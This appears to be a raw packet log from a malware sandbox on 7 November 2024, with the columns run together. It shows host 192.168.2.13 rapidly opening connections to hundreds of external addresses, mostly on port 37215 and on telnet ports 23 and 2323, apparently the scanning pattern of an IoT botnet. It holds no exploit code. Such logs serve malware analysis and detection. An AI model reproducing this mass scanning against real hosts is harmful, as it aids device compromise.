                                          Nov 7, 2024 11:58:00.414294958 CET3070437215192.168.2.1341.116.214.210
                                          Nov 7, 2024 11:58:00.414303064 CET3070437215192.168.2.1341.86.17.217
                                          Nov 7, 2024 11:58:00.414304018 CET3070437215192.168.2.1341.36.41.209
                                          Nov 7, 2024 11:58:00.414304972 CET3070437215192.168.2.1341.169.23.254
                                          Nov 7, 2024 11:58:00.414310932 CET3070437215192.168.2.1341.120.186.117
                                          Nov 7, 2024 11:58:00.414320946 CET3070437215192.168.2.1341.216.61.34
                                          Nov 7, 2024 11:58:00.414330006 CET3070437215192.168.2.1341.210.191.200
                                          Nov 7, 2024 11:58:00.414341927 CET3070437215192.168.2.1341.158.242.170
                                          Nov 7, 2024 11:58:00.414341927 CET3070437215192.168.2.1341.177.116.30
                                          Nov 7, 2024 11:58:00.414356947 CET3070437215192.168.2.1341.32.174.187
                                          Nov 7, 2024 11:58:00.414362907 CET3070437215192.168.2.1341.240.136.69
                                          Nov 7, 2024 11:58:00.414365053 CET3070437215192.168.2.1341.93.215.119
                                          Nov 7, 2024 11:58:00.414382935 CET3070437215192.168.2.1341.117.188.208
                                          Nov 7, 2024 11:58:00.414383888 CET234345812.155.172.52192.168.2.13
                                          Nov 7, 2024 11:58:00.414385080 CET3070437215192.168.2.1341.18.112.72
                                          Nov 7, 2024 11:58:00.414387941 CET3070437215192.168.2.1341.43.28.52
                                          Nov 7, 2024 11:58:00.414391994 CET3070437215192.168.2.1341.249.3.55
                                          Nov 7, 2024 11:58:00.414391994 CET3070437215192.168.2.1341.212.249.107
                                          Nov 7, 2024 11:58:00.414391994 CET3070437215192.168.2.1341.137.125.60
                                          Nov 7, 2024 11:58:00.414405107 CET3070437215192.168.2.1341.24.218.91
                                          Nov 7, 2024 11:58:00.414407015 CET3070437215192.168.2.1341.106.209.159
                                          Nov 7, 2024 11:58:00.414407015 CET3070437215192.168.2.1341.38.158.14
                                          Nov 7, 2024 11:58:00.414407015 CET3070437215192.168.2.1341.37.214.132
                                          Nov 7, 2024 11:58:00.414410114 CET3070437215192.168.2.1341.189.112.18
                                          Nov 7, 2024 11:58:00.414422989 CET3070437215192.168.2.1341.62.122.119
                                          Nov 7, 2024 11:58:00.414446115 CET4345823192.168.2.1312.155.172.52
                                          Nov 7, 2024 11:58:00.414459944 CET3070437215192.168.2.1341.201.142.57
                                          Nov 7, 2024 11:58:00.414477110 CET3070437215192.168.2.1341.160.33.40
                                          Nov 7, 2024 11:58:00.414479971 CET3070437215192.168.2.1341.67.240.252
                                          Nov 7, 2024 11:58:00.414480925 CET3070437215192.168.2.1341.187.81.206
                                          Nov 7, 2024 11:58:00.414489031 CET3070437215192.168.2.1341.250.6.255
                                          Nov 7, 2024 11:58:00.414489031 CET3070437215192.168.2.1341.226.215.34
                                          Nov 7, 2024 11:58:00.414494991 CET3070437215192.168.2.1341.45.55.73
                                          Nov 7, 2024 11:58:00.414495945 CET3070437215192.168.2.1341.216.109.201
                                          Nov 7, 2024 11:58:00.414496899 CET3070437215192.168.2.1341.77.222.61
                                          Nov 7, 2024 11:58:00.414496899 CET3070437215192.168.2.1341.217.52.62
                                          Nov 7, 2024 11:58:00.414496899 CET3070437215192.168.2.1341.125.174.49
                                          Nov 7, 2024 11:58:00.414509058 CET3070437215192.168.2.1341.63.200.222
                                          Nov 7, 2024 11:58:00.414510012 CET3070437215192.168.2.1341.212.63.176
                                          Nov 7, 2024 11:58:00.414511919 CET3070437215192.168.2.1341.138.36.8
                                          Nov 7, 2024 11:58:00.414511919 CET33122323192.168.2.13190.59.173.113
                                          Nov 7, 2024 11:58:00.414530039 CET331223192.168.2.13123.220.71.20
                                          Nov 7, 2024 11:58:00.414531946 CET3070437215192.168.2.1341.140.227.217
                                          Nov 7, 2024 11:58:00.414532900 CET331223192.168.2.1389.64.126.245
                                          Nov 7, 2024 11:58:00.414539099 CET331223192.168.2.13184.150.234.86
                                          Nov 7, 2024 11:58:00.414539099 CET3070437215192.168.2.1341.90.89.200
                                          Nov 7, 2024 11:58:00.414539099 CET331223192.168.2.1342.165.134.102
                                          Nov 7, 2024 11:58:00.414540052 CET331223192.168.2.13159.29.8.11
                                          Nov 7, 2024 11:58:00.414540052 CET331223192.168.2.13219.108.92.211
                                          Nov 7, 2024 11:58:00.414540052 CET3070437215192.168.2.1341.188.69.59
                                          Nov 7, 2024 11:58:00.414540052 CET331223192.168.2.13195.30.175.140
                                          Nov 7, 2024 11:58:00.414552927 CET33122323192.168.2.13180.109.27.197
                                          Nov 7, 2024 11:58:00.414552927 CET331223192.168.2.13134.23.214.85
                                          Nov 7, 2024 11:58:00.414552927 CET331223192.168.2.13186.74.157.49
                                          Nov 7, 2024 11:58:00.414552927 CET331223192.168.2.1393.172.63.129
                                          Nov 7, 2024 11:58:00.414556026 CET331223192.168.2.1365.186.57.192
                                          Nov 7, 2024 11:58:00.414556026 CET331223192.168.2.1365.190.17.92
                                          Nov 7, 2024 11:58:00.414556026 CET331223192.168.2.13148.135.132.49
                                          Nov 7, 2024 11:58:00.414563894 CET331223192.168.2.13132.10.134.40
                                          Nov 7, 2024 11:58:00.414566994 CET331223192.168.2.132.115.44.191
                                          Nov 7, 2024 11:58:00.414567947 CET331223192.168.2.1371.147.191.118
                                          Nov 7, 2024 11:58:00.414567947 CET331223192.168.2.13188.84.193.23
                                          Nov 7, 2024 11:58:00.414570093 CET3070437215192.168.2.1341.247.237.73
                                          Nov 7, 2024 11:58:00.414570093 CET331223192.168.2.13186.157.39.99
                                          Nov 7, 2024 11:58:00.414570093 CET33122323192.168.2.13191.63.236.97
                                          Nov 7, 2024 11:58:00.414570093 CET3070437215192.168.2.1341.105.201.0
                                          Nov 7, 2024 11:58:00.414586067 CET331223192.168.2.1342.131.20.230
                                          Nov 7, 2024 11:58:00.414588928 CET3070437215192.168.2.1341.9.93.3
                                          Nov 7, 2024 11:58:00.414588928 CET331223192.168.2.13143.195.37.78
                                          Nov 7, 2024 11:58:00.414591074 CET3070437215192.168.2.1341.43.139.232
                                          Nov 7, 2024 11:58:00.414588928 CET331223192.168.2.1377.202.92.203
                                          Nov 7, 2024 11:58:00.414588928 CET331223192.168.2.1350.8.16.74
                                          Nov 7, 2024 11:58:00.414589882 CET331223192.168.2.13168.58.72.251
                                          Nov 7, 2024 11:58:00.414589882 CET331223192.168.2.1371.39.70.48
                                          Nov 7, 2024 11:58:00.414591074 CET331223192.168.2.1362.182.226.202
                                          Nov 7, 2024 11:58:00.414589882 CET331223192.168.2.13179.206.51.116
                                          Nov 7, 2024 11:58:00.414589882 CET331223192.168.2.13190.240.47.8
                                          Nov 7, 2024 11:58:00.414589882 CET331223192.168.2.13196.74.3.17
                                          Nov 7, 2024 11:58:00.414601088 CET331223192.168.2.1387.172.232.113
                                          Nov 7, 2024 11:58:00.414602041 CET33122323192.168.2.13147.90.51.64
                                          Nov 7, 2024 11:58:00.414601088 CET331223192.168.2.13114.139.226.126
                                          Nov 7, 2024 11:58:00.414601088 CET331223192.168.2.1384.145.88.128
                                          Nov 7, 2024 11:58:00.414602995 CET331223192.168.2.1397.184.130.202
                                          Nov 7, 2024 11:58:00.414601088 CET3070437215192.168.2.1341.20.138.14
                                          Nov 7, 2024 11:58:00.414602995 CET331223192.168.2.13132.103.63.99
                                          Nov 7, 2024 11:58:00.414602995 CET331223192.168.2.13118.134.203.45
                                          Nov 7, 2024 11:58:00.414606094 CET331223192.168.2.13217.225.116.158
                                          Nov 7, 2024 11:58:00.414607048 CET33122323192.168.2.13156.44.223.226
                                          Nov 7, 2024 11:58:00.414607048 CET331223192.168.2.13121.89.149.40
                                          Nov 7, 2024 11:58:00.414607048 CET3070437215192.168.2.1341.85.231.165
                                          Nov 7, 2024 11:58:00.414608002 CET331223192.168.2.13167.225.254.116
                                          Nov 7, 2024 11:58:00.414608955 CET331223192.168.2.13183.56.198.246
                                          Nov 7, 2024 11:58:00.414608955 CET331223192.168.2.1370.220.69.250
                                          Nov 7, 2024 11:58:00.414608955 CET331223192.168.2.13131.93.207.62
                                          Nov 7, 2024 11:58:00.414608955 CET3070437215192.168.2.1341.78.157.229
                                          Nov 7, 2024 11:58:00.414613962 CET331223192.168.2.1385.173.96.71
                                          Nov 7, 2024 11:58:00.414618015 CET3070437215192.168.2.1341.34.17.197
                                          Nov 7, 2024 11:58:00.414627075 CET3070437215192.168.2.1341.51.157.5
                                          Nov 7, 2024 11:58:00.414627075 CET331223192.168.2.1389.89.156.54
                                          Nov 7, 2024 11:58:00.414628029 CET3070437215192.168.2.1341.171.118.220
                                          Nov 7, 2024 11:58:00.414628029 CET331223192.168.2.13123.255.245.149
                                          Nov 7, 2024 11:58:00.414628029 CET331223192.168.2.1378.7.95.3
                                          Nov 7, 2024 11:58:00.414629936 CET331223192.168.2.13187.164.143.148
                                          Nov 7, 2024 11:58:00.414629936 CET331223192.168.2.138.239.44.163
                                          Nov 7, 2024 11:58:00.414630890 CET331223192.168.2.1360.140.215.211
                                          Nov 7, 2024 11:58:00.414630890 CET331223192.168.2.13163.32.113.52
                                          Nov 7, 2024 11:58:00.414632082 CET331223192.168.2.1389.56.110.68
                                          Nov 7, 2024 11:58:00.414632082 CET331223192.168.2.13133.215.248.65
                                          Nov 7, 2024 11:58:00.414632082 CET331223192.168.2.13174.35.221.221
                                          Nov 7, 2024 11:58:00.414632082 CET331223192.168.2.13110.15.138.200
                                          Nov 7, 2024 11:58:00.414632082 CET33122323192.168.2.1359.9.230.124
                                          Nov 7, 2024 11:58:00.414635897 CET331223192.168.2.13179.150.125.75
                                          Nov 7, 2024 11:58:00.414637089 CET3070437215192.168.2.1341.65.244.90
                                          Nov 7, 2024 11:58:00.414637089 CET331223192.168.2.1319.46.49.21
                                          Nov 7, 2024 11:58:00.414657116 CET331223192.168.2.13193.21.243.84
                                          Nov 7, 2024 11:58:00.414657116 CET331223192.168.2.1351.175.11.172
                                          Nov 7, 2024 11:58:00.414659023 CET3070437215192.168.2.1341.71.156.68
                                          Nov 7, 2024 11:58:00.414659023 CET331223192.168.2.1324.148.17.184
                                          Nov 7, 2024 11:58:00.414659023 CET331223192.168.2.13150.173.113.65
                                          Nov 7, 2024 11:58:00.414659023 CET331223192.168.2.13119.220.143.56
                                          Nov 7, 2024 11:58:00.414659023 CET331223192.168.2.13185.255.68.24
                                          Nov 7, 2024 11:58:00.414661884 CET331223192.168.2.13118.117.119.181
                                          Nov 7, 2024 11:58:00.414659023 CET331223192.168.2.13157.216.111.207
                                          Nov 7, 2024 11:58:00.414661884 CET33122323192.168.2.13118.127.186.101
                                          Nov 7, 2024 11:58:00.414663076 CET331223192.168.2.13141.27.48.136
                                          Nov 7, 2024 11:58:00.414664030 CET331223192.168.2.1348.121.109.209
                                          Nov 7, 2024 11:58:00.414664030 CET33122323192.168.2.13190.17.58.199
                                          Nov 7, 2024 11:58:00.414663076 CET331223192.168.2.1348.65.40.212
                                          Nov 7, 2024 11:58:00.414664030 CET331223192.168.2.1384.160.248.86
                                          Nov 7, 2024 11:58:00.414663076 CET331223192.168.2.13200.201.245.135
                                          Nov 7, 2024 11:58:00.414664030 CET331223192.168.2.1379.178.191.140
                                          Nov 7, 2024 11:58:00.414669037 CET3070437215192.168.2.1341.240.193.18
                                          Nov 7, 2024 11:58:00.414664030 CET331223192.168.2.13110.116.34.96
                                          Nov 7, 2024 11:58:00.414669037 CET331223192.168.2.13192.171.74.140
                                          Nov 7, 2024 11:58:00.414669037 CET331223192.168.2.1335.15.224.69
                                          Nov 7, 2024 11:58:00.414669037 CET331223192.168.2.13167.218.171.1
                                          Nov 7, 2024 11:58:00.414669037 CET3070437215192.168.2.1341.72.56.167
                                          Nov 7, 2024 11:58:00.414676905 CET33122323192.168.2.13129.155.119.248
                                          Nov 7, 2024 11:58:00.414676905 CET3070437215192.168.2.1341.67.252.83
                                          Nov 7, 2024 11:58:00.414676905 CET331223192.168.2.1349.5.7.149
                                          Nov 7, 2024 11:58:00.414676905 CET3070437215192.168.2.1341.97.157.122
                                          Nov 7, 2024 11:58:00.414676905 CET3070437215192.168.2.1341.44.118.18
                                          Nov 7, 2024 11:58:00.414679050 CET331223192.168.2.13137.120.214.255
                                          Nov 7, 2024 11:58:00.414679050 CET3070437215192.168.2.1341.19.229.170
                                          Nov 7, 2024 11:58:00.414679050 CET331223192.168.2.13152.255.120.3
                                          Nov 7, 2024 11:58:00.414680958 CET33122323192.168.2.13109.10.187.245
                                          Nov 7, 2024 11:58:00.414684057 CET331223192.168.2.139.90.14.97
                                          Nov 7, 2024 11:58:00.414684057 CET3070437215192.168.2.1341.60.166.43
                                          Nov 7, 2024 11:58:00.414684057 CET331223192.168.2.1368.102.92.205
                                          Nov 7, 2024 11:58:00.414684057 CET331223192.168.2.13113.187.80.70
                                          Nov 7, 2024 11:58:00.414684057 CET331223192.168.2.13153.55.130.187
                                          Nov 7, 2024 11:58:00.414684057 CET331223192.168.2.1374.79.101.191
                                          Nov 7, 2024 11:58:00.414684057 CET3070437215192.168.2.1341.235.78.18
                                          Nov 7, 2024 11:58:00.414684057 CET3070437215192.168.2.1341.63.82.204
                                          Nov 7, 2024 11:58:00.414684057 CET331223192.168.2.13193.9.10.144
                                          Nov 7, 2024 11:58:00.414684057 CET331223192.168.2.1364.112.226.157
                                          Nov 7, 2024 11:58:00.414684057 CET331223192.168.2.1370.207.236.221
                                          Nov 7, 2024 11:58:00.414684057 CET331223192.168.2.13102.108.144.15
                                          Nov 7, 2024 11:58:00.414715052 CET331223192.168.2.13115.33.194.224
                                          Nov 7, 2024 11:58:00.414715052 CET331223192.168.2.13107.240.105.36
                                          Nov 7, 2024 11:58:00.414715052 CET331223192.168.2.13138.163.103.105
                                          Nov 7, 2024 11:58:00.414716005 CET331223192.168.2.1386.216.124.58
                                          Nov 7, 2024 11:58:00.414716005 CET331223192.168.2.13171.156.36.45
                                          Nov 7, 2024 11:58:00.414716005 CET331223192.168.2.13110.232.165.199
                                          Nov 7, 2024 11:58:00.414719105 CET331223192.168.2.1361.186.4.188
                                          Nov 7, 2024 11:58:00.414716005 CET331223192.168.2.13194.153.137.238
                                          Nov 7, 2024 11:58:00.414721012 CET3070437215192.168.2.1341.119.83.77
                                          Nov 7, 2024 11:58:00.414719105 CET331223192.168.2.13113.149.171.56
                                          Nov 7, 2024 11:58:00.414715052 CET331223192.168.2.1338.92.158.94
                                          Nov 7, 2024 11:58:00.414719105 CET3070437215192.168.2.1341.44.173.115
                                          Nov 7, 2024 11:58:00.414715052 CET331223192.168.2.13170.64.94.111
                                          Nov 7, 2024 11:58:00.414716959 CET331223192.168.2.13119.79.62.162
                                          Nov 7, 2024 11:58:00.414719105 CET3070437215192.168.2.1341.193.198.22
                                          Nov 7, 2024 11:58:00.414715052 CET331223192.168.2.13195.64.8.194
                                          Nov 7, 2024 11:58:00.414716959 CET3070437215192.168.2.1341.248.210.145
                                          Nov 7, 2024 11:58:00.414719105 CET33122323192.168.2.1383.228.224.8
                                          Nov 7, 2024 11:58:00.414735079 CET331223192.168.2.13150.65.148.180
                                          Nov 7, 2024 11:58:00.414715052 CET331223192.168.2.1372.194.193.46
                                          Nov 7, 2024 11:58:00.414715052 CET331223192.168.2.13198.239.158.123
                                          Nov 7, 2024 11:58:00.414715052 CET3070437215192.168.2.1341.183.82.183
                                          Nov 7, 2024 11:58:00.414715052 CET331223192.168.2.13104.91.64.73
                                          Nov 7, 2024 11:58:00.414735079 CET331223192.168.2.13115.192.116.157
                                          Nov 7, 2024 11:58:00.414716959 CET331223192.168.2.13137.29.23.37
                                          Nov 7, 2024 11:58:00.414716005 CET331223192.168.2.1318.192.118.96
                                          Nov 7, 2024 11:58:00.414715052 CET3070437215192.168.2.1341.245.5.238
                                          Nov 7, 2024 11:58:00.414716005 CET3070437215192.168.2.1341.125.132.121
                                          Nov 7, 2024 11:58:00.414715052 CET3070437215192.168.2.1341.127.192.26
                                          Nov 7, 2024 11:58:00.414716959 CET331223192.168.2.13208.90.189.13
                                          Nov 7, 2024 11:58:00.414715052 CET331223192.168.2.13220.162.24.178
                                          Nov 7, 2024 11:58:00.414716959 CET33122323192.168.2.131.51.25.66
                                          Nov 7, 2024 11:58:00.414715052 CET331223192.168.2.13205.53.157.95
                                          Nov 7, 2024 11:58:00.414716959 CET331223192.168.2.134.185.177.118
                                          Nov 7, 2024 11:58:00.414715052 CET331223192.168.2.13140.30.62.111
                                          Nov 7, 2024 11:58:00.414742947 CET331223192.168.2.13160.23.246.31
                                          Nov 7, 2024 11:58:00.414743900 CET3070437215192.168.2.1341.221.83.45
                                          Nov 7, 2024 11:58:00.414743900 CET331223192.168.2.1352.218.234.126
                                          Nov 7, 2024 11:58:00.414752007 CET331223192.168.2.13161.105.139.195
                                          Nov 7, 2024 11:58:00.414743900 CET331223192.168.2.1396.12.86.122
                                          Nov 7, 2024 11:58:00.414752007 CET3070437215192.168.2.1341.67.39.210
                                          Nov 7, 2024 11:58:00.414743900 CET331223192.168.2.1324.230.33.211
                                          Nov 7, 2024 11:58:00.414752007 CET331223192.168.2.1359.241.164.62
                                          Nov 7, 2024 11:58:00.414743900 CET331223192.168.2.13143.221.91.134
                                          Nov 7, 2024 11:58:00.414752007 CET3070437215192.168.2.1341.109.11.34
                                          Nov 7, 2024 11:58:00.414743900 CET331223192.168.2.1346.122.255.214
                                          Nov 7, 2024 11:58:00.414755106 CET331223192.168.2.13112.61.85.151
                                          Nov 7, 2024 11:58:00.414755106 CET33122323192.168.2.13184.60.133.63
                                          Nov 7, 2024 11:58:00.414743900 CET3070437215192.168.2.1341.7.6.123
                                          Nov 7, 2024 11:58:00.414755106 CET331223192.168.2.13108.159.39.225
                                          Nov 7, 2024 11:58:00.414755106 CET331223192.168.2.13129.177.249.46
                                          Nov 7, 2024 11:58:00.414755106 CET3070437215192.168.2.1341.29.131.119
                                          Nov 7, 2024 11:58:00.414755106 CET331223192.168.2.1391.35.145.10
                                          Nov 7, 2024 11:58:00.414758921 CET3070437215192.168.2.1341.21.130.145
                                          Nov 7, 2024 11:58:00.414757967 CET3070437215192.168.2.1341.68.201.2
                                          Nov 7, 2024 11:58:00.414755106 CET3070437215192.168.2.1341.196.76.191
                                          Nov 7, 2024 11:58:00.414758921 CET331223192.168.2.13201.139.91.6
                                          Nov 7, 2024 11:58:00.414755106 CET331223192.168.2.13162.204.186.118
                                          Nov 7, 2024 11:58:00.414758921 CET331223192.168.2.13143.253.143.247
                                          Nov 7, 2024 11:58:00.414755106 CET331223192.168.2.13109.35.19.228
                                          Nov 7, 2024 11:58:00.414764881 CET331223192.168.2.13131.171.21.117
                                          Nov 7, 2024 11:58:00.414758921 CET331223192.168.2.13102.63.8.144
                                          Nov 7, 2024 11:58:00.414767027 CET3070437215192.168.2.1341.163.44.236
                                          Nov 7, 2024 11:58:00.414758921 CET3070437215192.168.2.1341.107.63.6
                                          Nov 7, 2024 11:58:00.414755106 CET331223192.168.2.13164.138.105.124
                                          Nov 7, 2024 11:58:00.414766073 CET3070437215192.168.2.1341.127.182.156
                                          Nov 7, 2024 11:58:00.414763927 CET331223192.168.2.1331.120.165.110
                                          Nov 7, 2024 11:58:00.414758921 CET331223192.168.2.13216.101.151.112
                                          Nov 7, 2024 11:58:00.414757967 CET331223192.168.2.13161.128.225.100
                                          Nov 7, 2024 11:58:00.414760113 CET331223192.168.2.1324.220.86.39
                                          Nov 7, 2024 11:58:00.414764881 CET331223192.168.2.1354.115.182.210
                                          Nov 7, 2024 11:58:00.414757967 CET3070437215192.168.2.1341.90.243.69
                                          Nov 7, 2024 11:58:00.414766073 CET331223192.168.2.13199.135.15.20
                                          Nov 7, 2024 11:58:00.414757967 CET331223192.168.2.138.1.154.71
                                          Nov 7, 2024 11:58:00.414764881 CET331223192.168.2.13143.198.192.191
                                          Nov 7, 2024 11:58:00.414766073 CET331223192.168.2.13111.56.29.53
                                          Nov 7, 2024 11:58:00.414767027 CET331223192.168.2.13218.2.115.54
                                          Nov 7, 2024 11:58:00.414767027 CET331223192.168.2.1379.21.224.75
                                          Nov 7, 2024 11:58:00.414767027 CET33122323192.168.2.13160.11.171.200
                                          Nov 7, 2024 11:58:00.414767027 CET3070437215192.168.2.1341.110.19.115
                                          Nov 7, 2024 11:58:00.414767027 CET33122323192.168.2.1349.58.171.98
                                          Nov 7, 2024 11:58:00.414767027 CET331223192.168.2.13213.81.222.62
                                          Nov 7, 2024 11:58:00.414767027 CET331223192.168.2.13136.60.57.81
                                          Nov 7, 2024 11:58:00.414767027 CET33122323192.168.2.13221.168.80.139
                                          Nov 7, 2024 11:58:00.414767027 CET331223192.168.2.1337.145.158.233
                                          Nov 7, 2024 11:58:00.414767027 CET3070437215192.168.2.1341.205.216.250
                                          Nov 7, 2024 11:58:00.414798975 CET331223192.168.2.13140.229.58.15
                                          Nov 7, 2024 11:58:00.414799929 CET331223192.168.2.1383.120.210.252
                                          Nov 7, 2024 11:58:00.414799929 CET3070437215192.168.2.1341.239.49.184
                                          Nov 7, 2024 11:58:00.414799929 CET3070437215192.168.2.1341.174.133.238
                                          Nov 7, 2024 11:58:00.414800882 CET3070437215192.168.2.1341.44.71.150
                                          Nov 7, 2024 11:58:00.414799929 CET3070437215192.168.2.1341.26.108.83
                                          Nov 7, 2024 11:58:00.414799929 CET3070437215192.168.2.1341.230.114.42
                                          Nov 7, 2024 11:58:00.414800882 CET3070437215192.168.2.1341.150.40.215
                                          Nov 7, 2024 11:58:00.414800882 CET3070437215192.168.2.1341.150.23.247
                                          Nov 7, 2024 11:58:00.414808989 CET3070437215192.168.2.1341.248.227.52
                                          Nov 7, 2024 11:58:00.414818048 CET3070437215192.168.2.1341.228.124.41
                                          Nov 7, 2024 11:58:00.414823055 CET3070437215192.168.2.1341.88.7.87
                                          Nov 7, 2024 11:58:00.414850950 CET3070437215192.168.2.1341.147.102.113
                                          Nov 7, 2024 11:58:00.414858103 CET3070437215192.168.2.1341.3.187.31
                                          Nov 7, 2024 11:58:00.414872885 CET3070437215192.168.2.1341.233.13.11
                                          Nov 7, 2024 11:58:00.414874077 CET3070437215192.168.2.1341.13.80.240
                                          Nov 7, 2024 11:58:00.414880037 CET3070437215192.168.2.1341.99.218.13
                                          Nov 7, 2024 11:58:00.414880037 CET3070437215192.168.2.1341.187.158.191
                                          Nov 7, 2024 11:58:00.414880037 CET3070437215192.168.2.1341.95.27.202
                                          Nov 7, 2024 11:58:00.414886951 CET3070437215192.168.2.1341.209.234.40
                                          Nov 7, 2024 11:58:00.414887905 CET3070437215192.168.2.1341.147.10.66
                                          Nov 7, 2024 11:58:00.414894104 CET3070437215192.168.2.1341.246.198.184
                                          Nov 7, 2024 11:58:00.414896965 CET3070437215192.168.2.1341.157.24.176
                                          Nov 7, 2024 11:58:00.414896965 CET3070437215192.168.2.1341.205.250.24
                                          Nov 7, 2024 11:58:00.414902925 CET3070437215192.168.2.1341.20.96.191
                                          Nov 7, 2024 11:58:00.414902925 CET3070437215192.168.2.1341.246.163.111
                                          Nov 7, 2024 11:58:00.414922953 CET3070437215192.168.2.1341.138.48.35
                                          Nov 7, 2024 11:58:00.414922953 CET3070437215192.168.2.1341.229.14.83
                                          Nov 7, 2024 11:58:00.414928913 CET3070437215192.168.2.1341.231.45.97
                                          Nov 7, 2024 11:58:00.414941072 CET3070437215192.168.2.1341.138.252.29
                                          Nov 7, 2024 11:58:00.414942026 CET3070437215192.168.2.1341.14.141.126
                                          Nov 7, 2024 11:58:00.414941072 CET3070437215192.168.2.1341.233.93.99
                                          Nov 7, 2024 11:58:00.414941072 CET3070437215192.168.2.1341.73.242.144
                                          Nov 7, 2024 11:58:00.414943933 CET3070437215192.168.2.1341.136.131.155
                                          Nov 7, 2024 11:58:00.414943933 CET3070437215192.168.2.1341.191.43.53
                                          Nov 7, 2024 11:58:00.414968014 CET3070437215192.168.2.1341.83.171.208
                                          Nov 7, 2024 11:58:00.414983034 CET3070437215192.168.2.1341.35.159.23
                                          Nov 7, 2024 11:58:00.414983034 CET3070437215192.168.2.1341.106.205.139
                                          Nov 7, 2024 11:58:00.414999008 CET3070437215192.168.2.1341.229.10.144
                                          Nov 7, 2024 11:58:00.414999962 CET3070437215192.168.2.1341.148.240.96
                                          Nov 7, 2024 11:58:00.415000916 CET3070437215192.168.2.1341.134.126.228
                                          Nov 7, 2024 11:58:00.415002108 CET3070437215192.168.2.1341.145.42.201
                                          Nov 7, 2024 11:58:00.415007114 CET3070437215192.168.2.1341.189.68.153
                                          Nov 7, 2024 11:58:00.415028095 CET3070437215192.168.2.1341.214.73.155
                                          Nov 7, 2024 11:58:00.415028095 CET3070437215192.168.2.1341.201.209.39
                                          Nov 7, 2024 11:58:00.415028095 CET3070437215192.168.2.1341.150.166.240
                                          Nov 7, 2024 11:58:00.415041924 CET3070437215192.168.2.1341.227.76.227
                                          Nov 7, 2024 11:58:00.415049076 CET3070437215192.168.2.1341.143.104.189
                                          Nov 7, 2024 11:58:00.415049076 CET3070437215192.168.2.1341.1.52.66
                                          Nov 7, 2024 11:58:00.415050983 CET3070437215192.168.2.1341.122.188.38
                                          Nov 7, 2024 11:58:00.415050983 CET3070437215192.168.2.1341.58.133.235
                                          Nov 7, 2024 11:58:00.415050983 CET3070437215192.168.2.1341.170.6.216
                                          Nov 7, 2024 11:58:00.415074110 CET3070437215192.168.2.1341.163.99.129
                                          Nov 7, 2024 11:58:00.415074110 CET3070437215192.168.2.1341.112.174.225
                                          Nov 7, 2024 11:58:00.415074110 CET3070437215192.168.2.1341.213.5.132
                                          Nov 7, 2024 11:58:00.415088892 CET3070437215192.168.2.1341.185.69.132
                                          Nov 7, 2024 11:58:00.415107012 CET3070437215192.168.2.1341.235.112.205
                                          Nov 7, 2024 11:58:00.415107012 CET3070437215192.168.2.1341.149.108.254
                                          Nov 7, 2024 11:58:00.415107965 CET3070437215192.168.2.1341.165.255.112
                                          Nov 7, 2024 11:58:00.415108919 CET3070437215192.168.2.1341.254.244.111
                                          Nov 7, 2024 11:58:00.415112972 CET3070437215192.168.2.1341.19.179.199
                                          Nov 7, 2024 11:58:00.415112972 CET3070437215192.168.2.1341.225.146.6
                                          Nov 7, 2024 11:58:00.415126085 CET3070437215192.168.2.1341.165.130.158
                                          Nov 7, 2024 11:58:00.415132999 CET3070437215192.168.2.1341.111.94.173
                                          Nov 7, 2024 11:58:00.415133953 CET3070437215192.168.2.1341.243.138.83
                                          Nov 7, 2024 11:58:00.415133953 CET3070437215192.168.2.1341.20.99.8
                                          Nov 7, 2024 11:58:00.415133953 CET3070437215192.168.2.1341.177.10.59
                                          Nov 7, 2024 11:58:00.415138006 CET3070437215192.168.2.1341.199.165.219
                                          Nov 7, 2024 11:58:00.415138006 CET3070437215192.168.2.1341.137.108.185
                                          Nov 7, 2024 11:58:00.415157080 CET3070437215192.168.2.1341.182.203.48
                                          Nov 7, 2024 11:58:00.415157080 CET3070437215192.168.2.1341.2.79.171
                                          Nov 7, 2024 11:58:00.415158987 CET3070437215192.168.2.1341.248.129.41
                                          Nov 7, 2024 11:58:00.415163994 CET3070437215192.168.2.1341.118.114.23
                                          Nov 7, 2024 11:58:00.415163994 CET3070437215192.168.2.1341.205.97.194
                                          Nov 7, 2024 11:58:00.415164948 CET3070437215192.168.2.1341.92.149.238
                                          Nov 7, 2024 11:58:00.415170908 CET3070437215192.168.2.1341.173.154.145
                                          Nov 7, 2024 11:58:00.415170908 CET3070437215192.168.2.1341.226.127.166
                                          Nov 7, 2024 11:58:00.415173054 CET3070437215192.168.2.1341.203.254.14
                                          Nov 7, 2024 11:58:00.415175915 CET3070437215192.168.2.1341.55.34.5
                                          Nov 7, 2024 11:58:00.415175915 CET3070437215192.168.2.1341.121.167.225
                                          Nov 7, 2024 11:58:00.415180922 CET3070437215192.168.2.1341.56.87.25
                                          Nov 7, 2024 11:58:00.415180922 CET3070437215192.168.2.1341.59.48.167
                                          Nov 7, 2024 11:58:00.415185928 CET3070437215192.168.2.1341.55.164.81
                                          Nov 7, 2024 11:58:00.415185928 CET3070437215192.168.2.1341.99.15.223
                                          Nov 7, 2024 11:58:00.415209055 CET3070437215192.168.2.1341.68.155.196
                                          Nov 7, 2024 11:58:00.415215015 CET3070437215192.168.2.1341.36.215.153
                                          Nov 7, 2024 11:58:00.415216923 CET3070437215192.168.2.1341.208.117.128
                                          Nov 7, 2024 11:58:00.415220022 CET3070437215192.168.2.1341.18.80.233
                                          Nov 7, 2024 11:58:00.415227890 CET3070437215192.168.2.1341.219.39.137
                                          Nov 7, 2024 11:58:00.415227890 CET3070437215192.168.2.1341.18.236.110
                                          Nov 7, 2024 11:58:00.415230989 CET3070437215192.168.2.1341.28.201.132
                                          Nov 7, 2024 11:58:00.415235043 CET3070437215192.168.2.1341.39.24.218
                                          Nov 7, 2024 11:58:00.415252924 CET3070437215192.168.2.1341.219.25.63
                                          Nov 7, 2024 11:58:00.415254116 CET3070437215192.168.2.1341.191.39.213
                                          Nov 7, 2024 11:58:00.415254116 CET3070437215192.168.2.1341.61.137.100
                                          Nov 7, 2024 11:58:00.415267944 CET3070437215192.168.2.1341.239.198.130
                                          Nov 7, 2024 11:58:00.415285110 CET3070437215192.168.2.1341.242.196.254
                                          Nov 7, 2024 11:58:00.415286064 CET3070437215192.168.2.1341.187.190.192
                                          Nov 7, 2024 11:58:00.415288925 CET3070437215192.168.2.1341.254.15.128
                                          Nov 7, 2024 11:58:00.415298939 CET3070437215192.168.2.1341.51.96.59
                                          Nov 7, 2024 11:58:00.415326118 CET3070437215192.168.2.1341.210.195.125
                                          Nov 7, 2024 11:58:00.415328026 CET3070437215192.168.2.1341.122.214.225
                                          Nov 7, 2024 11:58:00.415328026 CET3070437215192.168.2.1341.191.247.181
                                          Nov 7, 2024 11:58:00.415330887 CET3070437215192.168.2.1341.237.102.212
